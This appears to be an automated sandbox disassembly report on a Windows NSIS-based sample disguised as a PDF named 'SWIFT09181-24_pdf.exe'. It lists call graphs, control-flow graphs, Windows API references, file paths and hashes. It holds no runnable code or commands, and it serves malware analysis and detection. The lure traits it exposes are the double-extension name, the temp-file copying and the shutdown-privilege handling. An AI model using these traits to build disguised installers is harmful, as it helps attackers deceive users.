4651->4643 4654 404cd7 SendMessageW 4651->4654 4656 404d56 4651->4656 4658 404d13 SendMessageW 4651->4658 4659 404d24 SendMessageW 4651->4659 4654->4651 4655->4622 4656->4643 4656->4647 4657 404d8e 4657->4626 4658->4651 4659->4651 4660->4663 4661 4050ab InvalidateRect 4661->4639 4662 4050c1 4661->4662 4671 404a39 4662->4671 4664 404fcf SendMessageW 4663->4664 4665 404fe5 4663->4665 4664->4665 4665->4661 4666 405046 4665->4666 4668 405059 SendMessageW SendMessageW 4665->4668 4666->4668 4668->4665 4669->4657 4670->4617 4674 404970 4671->4674 4673 404a4e 4673->4639 4675 404989 4674->4675 4676 406077 18 API calls 4675->4676 4677 4049ed 4676->4677 4678 406077 18 API calls 4677->4678 4679 4049f8 4678->4679 4680 406077 18 API calls 4679->4680 4681 404a0e lstrlenW wsprintfW SetDlgItemTextW 4680->4681 4681->4673 5307 4045b4 5308 4045e0 5307->5308 5309 4045f1 5307->5309 5368 40577e GetDlgItemTextW 5308->5368 5310 4045fd GetDlgItem 5309->5310 5313 40465c 5309->5313 5312 404611 5310->5312 5317 404625 SetWindowTextW 5312->5317 5320 405ab4 4 API calls 5312->5320 5314 404740 5313->5314 5322 406077 18 API calls 5313->5322 5366 4048ef 5313->5366 5314->5366 5370 40577e GetDlgItemTextW 5314->5370 5315 4045eb 5316 4062e9 5 API calls 5315->5316 5316->5309 5321 404119 19 API calls 5317->5321 5319 404180 8 API calls 5324 404903 5319->5324 5325 40461b 5320->5325 5326 404641 5321->5326 5327 4046d0 SHBrowseForFolderW 5322->5327 5323 404770 5328 405b11 18 API calls 5323->5328 5325->5317 5332 405a09 3 API calls 5325->5332 5329 404119 19 API calls 5326->5329 5327->5314 5330 4046e8 CoTaskMemFree 5327->5330 5331 404776 5328->5331 5333 40464f 5329->5333 5334 405a09 3 API calls 5330->5334 5371 406055 lstrcpynW 5331->5371 5332->5317 5369 40414e SendMessageW 5333->5369 5342 4046f5 5334->5342 5337 404655 5341 40642b 5 API calls 5337->5341 5338 40472c SetDlgItemTextW 5338->5314 5339 40478d 5340 40642b 5 API calls 5339->5340 5349 404794 5340->5349 5341->5313 5342->5338 5343 406077 18 API calls 5342->5343 5344 404714 lstrcmpiW 5343->5344 5344->5338 5346 404725 lstrcatW 5344->5346 5345 4047d5 5372 406055 lstrcpynW 5345->5372 5346->5338 5348 4047dc 5350 405ab4 4 API calls 5348->5350 5349->5345 5354 405a55 2 API calls 5349->5354 5355 40482d 5349->5355 5351 4047e2 GetDiskFreeSpaceW 5350->5351 5353 404806 MulDiv 5351->5353 5351->5355 5353->5355 5354->5349 5356 40489e 5355->5356 5358 404a39 21 API calls 5355->5358 5357 4048c1 5356->5357 5359 40140b 2 API calls 5356->5359 5373 40413b EnableWindow 5357->5373 5360 40488b 5358->5360 5359->5357 5361 4048a0 SetDlgItemTextW 5360->5361 5362 404890 5360->5362 5361->5356 5364 404970 21 API calls 5362->5364 5364->5356 5365 4048dd 5365->5366 5374 404549 5365->5374 5366->5319 5368->5315 5369->5337 5370->5323 5371->5339 5372->5348 5373->5365 5375 404557 5374->5375 5376 40455c SendMessageW 5374->5376 5375->5376 5376->5366 5377 4027b4 5378 4027ba 5377->5378 5379 4027c2 FindClose 5378->5379 5380 402a4c 5378->5380 5379->5380 5381 4042b6 5382 4042ce 5381->5382 5386 4043e8 5381->5386 5387 404119 19 API calls 5382->5387 5383 404452 5384 404524 5383->5384 5385 40445c GetDlgItem 5383->5385 5391 404180 8 API calls 5384->5391 5388 404476 5385->5388 5392 4044e5 5385->5392 5386->5383 5386->5384 5389 404423 GetDlgItem SendMessageW 5386->5389 5390 404335 5387->5390 5388->5392 5396 40449c 6 API calls 5388->5396 5412 40413b EnableWindow 5389->5412 5394 404119 19 API calls 5390->5394 5395 40451f 5391->5395 5392->5384 5397 4044f7 5392->5397 5401 404342 CheckDlgButton 5394->5401 5396->5392 5398 40450d 5397->5398 5399 4044fd SendMessageW 5397->5399 5398->5395 5402 404513 SendMessageW 5398->5402 5399->5398 5400 40444d 5403 404549 SendMessageW 5400->5403 5410 40413b EnableWindow 5401->5410 5402->5395 5403->5383 5405 404360 GetDlgItem 5411 40414e SendMessageW 5405->5411 5407 404376 SendMessageW 5408 404393 GetSysColor 5407->5408 5409 40439c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5407->5409 5408->5409 5409->5395 5410->5405 5411->5407 5412->5400 4704 401b37 4705 401b44 4704->4705 4706 401b88 4704->4706 4707 401bcd 4705->4707 4712 401b5b 4705->4712 4708 401bb2 GlobalAlloc 4706->4708 4709 401b8d 4706->4709 4711 406077 18 API calls 4707->4711 4719 402288 4707->4719 4710 406077 18 API calls 4708->4710 4709->4719 4725 406055 lstrcpynW 4709->4725 4710->4707 4713 402282 4711->4713 4723 406055 lstrcpynW 4712->4723 4717 40579a MessageBoxIndirectW 4713->4717 4716 401b9f GlobalFree 4716->4719 4717->4719 4718 401b6a 4724 406055 lstrcpynW 4718->4724 4721 401b79 4726 406055 lstrcpynW 4721->4726 4723->4718 4724->4721 4725->4716 4726->4719 5413 402537 5414 402562 5413->5414 5415 40254b 5413->5415 5417 402596 5414->5417 5418 402567 5414->5418 5416 402ba2 18 API calls 5415->5416 5425 402552 5416->5425 5419 402bbf 18 API calls 5417->5419 5420 402bbf 18 API calls 5418->5420 5421 40259d lstrlenW 5419->5421 5422 40256e WideCharToMultiByte lstrlenA 5420->5422 5421->5425 5422->5425 5423 4025ca 5424 4025e0 5423->5424 5426 405cdc WriteFile 5423->5426 5425->5423 5425->5424 5427 405d0b 5 API calls 5425->5427 5426->5424 5427->5423 5428 4014b8 5429 4014be 5428->5429 5430 401389 2 API calls 5429->5430 5431 4014c6 5430->5431 4733 4015b9 4734 402bbf 18 API calls 4733->4734 4735 4015c0 4734->4735 4736 405ab4 4 API calls 4735->4736 4748 4015c9 4736->4748 4737 401629 4738 40165b 4737->4738 4739 40162e 4737->4739 4743 401423 25 API calls 4738->4743 4741 401423 25 API calls 4739->4741 4740 405a36 CharNextW 4740->4748 4742 401635 4741->4742 4752 406055 lstrcpynW 4742->4752 4750 401653 4743->4750 4745 405700 2 API calls 4745->4748 4746 40571d 5 API calls 4746->4748 4747 401642 SetCurrentDirectoryW 4747->4750 4748->4737 4748->4740 4748->4745 4748->4746 4749 40160f GetFileAttributesW 4748->4749 4751 405683 4 API calls 4748->4751 4749->4748 4751->4748 4752->4747 5432 10002a7f 5433 10002a97 5432->5433 5434 1000158f 2 API calls 5433->5434 5435 10002ab2 5434->5435

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 0 4032a0-4032d2 SetErrorMode GetVersion 1 4032d4-4032dc call 40642b 0->1 2 4032e5-403378 call 4063bf * 3 call 40642b * 2 #17 OleInitialize SHGetFileInfoW call 406055 GetCommandLineW call 406055 GetModuleHandleW 0->2 1->2 7 4032de 1->7 20 403382-40339c call 405a36 CharNextW 2->20 21 40337a-403381 2->21 7->2 24 4033a2-4033a8 20->24 25 4034b4-4034ce GetTempPathW call 40326f 20->25 21->20 27 4033b1-4033b7 24->27 28 4033aa-4033af 24->28 34 4034d0-4034ee GetWindowsDirectoryW lstrcatW call 40326f 25->34 35 403526-403540 DeleteFileW call 402dee 25->35 30 4033b9-4033bd 27->30 31 4033be-4033c2 27->31 28->27 28->28 30->31 32 403480-40348d call 405a36 31->32 33 4033c8-4033ce 31->33 53 403491-403497 32->53 54 40348f-403490 32->54 36 4033d0-4033d7 33->36 37 4033e8-403421 33->37 34->35 52 4034f0-403520 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 34->52 48 4035f1-403602 call 4037c4 OleUninitialize 35->48 49 403546-40354c 35->49 42 4033d9-4033dc 36->42 43 4033de 36->43 44 403423-403428 37->44 45 40343e-403478 37->45 42->37 42->43 43->37 44->45 50 40342a-403432 44->50 45->32 51 40347a-40347e 45->51 71 403728-40372e 48->71 72 403608-403618 call 40579a ExitProcess 48->72 56 4035e1-4035e8 call 40389e 49->56 57 403552-40355d call 405a36 49->57 59 403434-403437 50->59 60 403439 50->60 51->32 61 40349f-4034ad call 406055 51->61 52->35 52->48 53->24 55 40349d 53->55 54->53 63 4034b2 55->63 70 4035ed 56->70 73 4035ab-4035b5 57->73 74 40355f-403594 57->74 59->45 59->60 60->45 61->63 63->25 70->48 76 403730-403746 GetCurrentProcess OpenProcessToken 71->76 77 4037ac-4037b4 71->77 81 4035b7-4035c5 call 405b11 73->81 82 40361e-403632 call 40571d lstrcatW 73->82 78 403596-40359a 74->78 84 403748-403776 LookupPrivilegeValueW AdjustTokenPrivileges 76->84 85 40377c-40378a call 40642b 76->85 79 4037b6 77->79 80 4037ba-4037be ExitProcess 77->80 87 4035a3-4035a7 78->87 88 40359c-4035a1 78->88 79->80 81->48 97 4035c7-4035dd call 406055 * 2 81->97 98 403634-40363a lstrcatW 82->98 99 40363f-403659 lstrcatW lstrcmpiW 82->99 84->85 95 403798-4037a3 ExitWindowsEx 85->95 96 40378c-403796 85->96 87->78 92 4035a9 87->92 88->87 88->92 92->73 95->77 101 4037a5-4037a7 call 40140b 95->101 96->95 96->101 97->56 98->99 99->48 100 40365b-40365e 99->100 104 403660-403665 call 405683 100->104 105 403667 call 405700 100->105 101->77 113 40366c-40367a SetCurrentDirectoryW 104->113 105->113 114 403687-4036b0 call 406055 113->114 115 40367c-403682 call 406055 113->115 119 4036b5-4036d1 call 406077 DeleteFileW 114->119 115->114 122 403712-40371a 119->122 123 4036d3-4036e3 CopyFileW 119->123 122->119 125 40371c-403723 call 405ef6 122->125 123->122 124 4036e5-403705 call 405ef6 call 406077 call 405735 123->124 124->122 134 403707-40370e CloseHandle 124->134 125->48 134->122
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNELBASE ref: 004032C2
                                                                                                                                    • GetVersion.KERNEL32 ref: 004032C8
                                                                                                                                    • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                                                    • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                                                    • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe",00000000), ref: 00403363
                                                                                                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe",00000020), ref: 0040338A
                                                                                                                                      • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                      • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
                                                                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
                                                                                                                                    • DeleteFileW.KERNELBASE(1033), ref: 0040352B
                                                                                                                                      • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                    • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403618
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe",00000000,?), ref: 0040362B
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe",00000000,?), ref: 0040363A
                                                                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe",00000000,?), ref: 00403645
                                                                                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe",00000000,?), ref: 00403651
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
                                                                                                                                    • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\SWIFT09181-24_pdf.exe,0042AA28,00000001), ref: 004036DB
                                                                                                                                    • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                                                    • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                                    • String ID: "C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SWIFT09181-24_pdf.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                                    • API String ID: 3586999533-669638185
                                                                                                                                    • Opcode ID: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                                                    • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                                                    • Opcode Fuzzy Hash: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                                                    • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 135 404b30-404b7c GetDlgItem * 2 136 404b82-404c16 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 135->136 137 404d9d-404da4 135->137 138 404c25-404c2c DeleteObject 136->138 139 404c18-404c23 SendMessageW 136->139 140 404da6-404db6 137->140 141 404db8 137->141 143 404c2e-404c36 138->143 139->138 142 404dbb-404dc4 140->142 141->142 144 404dc6-404dc9 142->144 145 404dcf-404dd5 142->145 146 404c38-404c3b 143->146 147 404c5f-404c63 143->147 144->145 149 404eb3-404eba 144->149 152 404de4-404deb 145->152 153 404dd7-404dde 145->153 150 404c40-404c5d call 406077 SendMessageW * 2 146->150 151 404c3d 146->151 147->143 148 404c65-404c91 call 404119 * 2 147->148 191 404c97-404c9d 148->191 192 404d5c-404d6f GetWindowLongW SetWindowLongW 148->192 155 404f2b-404f33 149->155 156 404ebc-404ec2 149->156 150->147 151->150 158 404e60-404e63 152->158 159 404ded-404df0 152->159 153->149 153->152 164 404f35-404f3b SendMessageW 155->164 165 404f3d-404f44 155->165 161 405113-405125 call 404180 156->161 162 404ec8-404ed2 156->162 158->149 163 404e65-404e6f 158->163 167 404df2-404df9 159->167 168 404dfb-404e10 call 404a7e 159->168 162->161 173 404ed8-404ee7 SendMessageW 162->173 175 404e71-404e7d SendMessageW 163->175 176 404e7f-404e89 163->176 164->165 169 404f46-404f4d 165->169 170 404f78-404f7f 165->170 167->158 167->168 168->158 190 404e12-404e23 168->190 178 404f56-404f5d 169->178 179 404f4f-404f50 ImageList_Destroy 169->179 182 4050d5-4050dc 170->182 183 404f85-404f91 call 4011ef 170->183 173->161 184 404eed-404efe SendMessageW 173->184 175->176 176->149 177 404e8b-404e95 176->177 186 404ea6-404eb0 177->186 187 404e97-404ea4 177->187 188 404f66-404f72 178->188 189 404f5f-404f60 GlobalFree 178->189 179->178 182->161 196 4050de-4050e5 182->196 209 404fa1-404fa4 183->209 210 404f93-404f96 183->210 194 404f00-404f06 184->194 195 404f08-404f0a 184->195 186->149 187->149 188->170 189->188 190->158 197 404e25-404e27 190->197 198 404ca0-404ca7 191->198 202 404d75-404d79 192->202 194->195 200 404f0b-404f24 call 401299 SendMessageW 194->200 195->200 196->161 201 4050e7-405111 ShowWindow GetDlgItem ShowWindow 196->201 205 404e29-404e30 197->205 206 404e3a 197->206 207 404d3d-404d50 198->207 208 404cad-404cd5 198->208 200->155 201->161 203 404d93-404d9b call 40414e 202->203 204 404d7b-404d8e ShowWindow call 40414e 202->204 203->137 204->161 214 404e32-404e34 205->214 215 404e36-404e38 205->215 218 404e3d-404e59 call 40117d 206->218 207->198 222 404d56-404d5a 207->222 216 404cd7-404d0d SendMessageW 208->216 217 404d0f-404d11 208->217 223 404fe5-405009 call 4011ef 209->223 224 404fa6-404fbf call 4012e2 call 401299 209->224 219 404f98 210->219 220 404f99-404f9c call 404afe 210->220 214->218 215->218 216->207 228 404d13-404d22 SendMessageW 217->228 229 404d24-404d3a SendMessageW 217->229 218->158 219->220 220->209 222->192 222->202 237 4050ab-4050bf InvalidateRect 223->237 238 40500f 223->238 242 404fc1-404fc7 224->242 243 404fcf-404fde SendMessageW 224->243 228->207 229->207 237->182 240 4050c1-4050d0 call 404a51 call 404a39 237->240 241 405012-40501d 238->241 240->182 244 405093-4050a5 241->244 245 40501f-40502e 241->245 247 404fc9 242->247 248 404fca-404fcd 242->248 243->223 244->237 244->241 250 405030-40503d 245->250 251 405041-405044 245->251 247->248 248->242 248->243 250->251 252 405046-405049 251->252 253 40504b-405054 251->253 255 405059-405091 SendMessageW * 2 252->255 253->255 256 405056 253->256 255->244 256->255
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                    • String ID: $M$N
                                                                                                                                    • API String ID: 1638840714-813528018
                                                                                                                                    • Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                                                    • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                                                    • Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                                                    • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 500 406077-406082 501 406084-406093 500->501 502 406095-4060ab 500->502 501->502 503 4060b1-4060be 502->503 504 4062c3-4062c9 502->504 503->504 507 4060c4-4060cb 503->507 505 4060d0-4060dd 504->505 506 4062cf-4062da 504->506 505->506 510 4060e3-4060ef 505->510 508 4062e5-4062e6 506->508 509 4062dc-4062e0 call 406055 506->509 507->504 509->508 512 4062b0 510->512 513 4060f5-406131 510->513 514 4062b2-4062bc 512->514 515 4062be-4062c1 512->515 516 406251-406255 513->516 517 406137-406142 GetVersion 513->517 514->504 515->504 518 406257-40625b 516->518 519 40628a-40628e 516->519 520 406144-406148 517->520 521 40615c 517->521 522 40626b-406278 call 406055 518->522 523 40625d-406269 call 405f9c 518->523 525 406290-406298 call 406077 519->525 526 40629d-4062ae lstrlenW 519->526 520->521 527 40614a-40614e 520->527 524 406163-40616a 521->524 538 40627d-406286 522->538 523->538 530 40616c-40616e 524->530 531 40616f-406171 524->531 525->526 526->504 527->521 528 406150-406154 527->528 528->521 534 406156-40615a 528->534 530->531 536 406173-406199 call 405f22 531->536 537 4061ad-4061b0 531->537 534->524 548 406238-40623c 536->548 549 40619f-4061a8 call 406077 536->549 541 4061c0-4061c3 537->541 542 4061b2-4061be GetSystemDirectoryW 537->542 538->526 540 406288 538->540 544 406249-40624f call 4062e9 540->544 546 4061c5-4061d3 GetWindowsDirectoryW 541->546 547 40622e-406230 541->547 545 406232-406236 542->545 544->526 545->544 545->548 546->547 547->545 550 4061d5-4061df 547->550 548->544 555 40623e-406244 lstrcatW 548->555 549->545 552 4061e1-4061e4 550->552 553 4061f9-40620f SHGetSpecialFolderLocation 550->553 552->553 557 4061e6-4061ed 552->557 558 406211-406228 SHGetPathFromIDListW CoTaskMemFree 553->558 559 40622a 553->559 555->544 561 4061f5-4061f7 557->561 558->545 558->559 559->547 561->545 561->553
                                                                                                                                    APIs
                                                                                                                                    • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040613A
                                                                                                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B8
                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061CB
                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                                                    • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406215
                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                                                    • lstrlenW.KERNEL32(Call,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040629E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
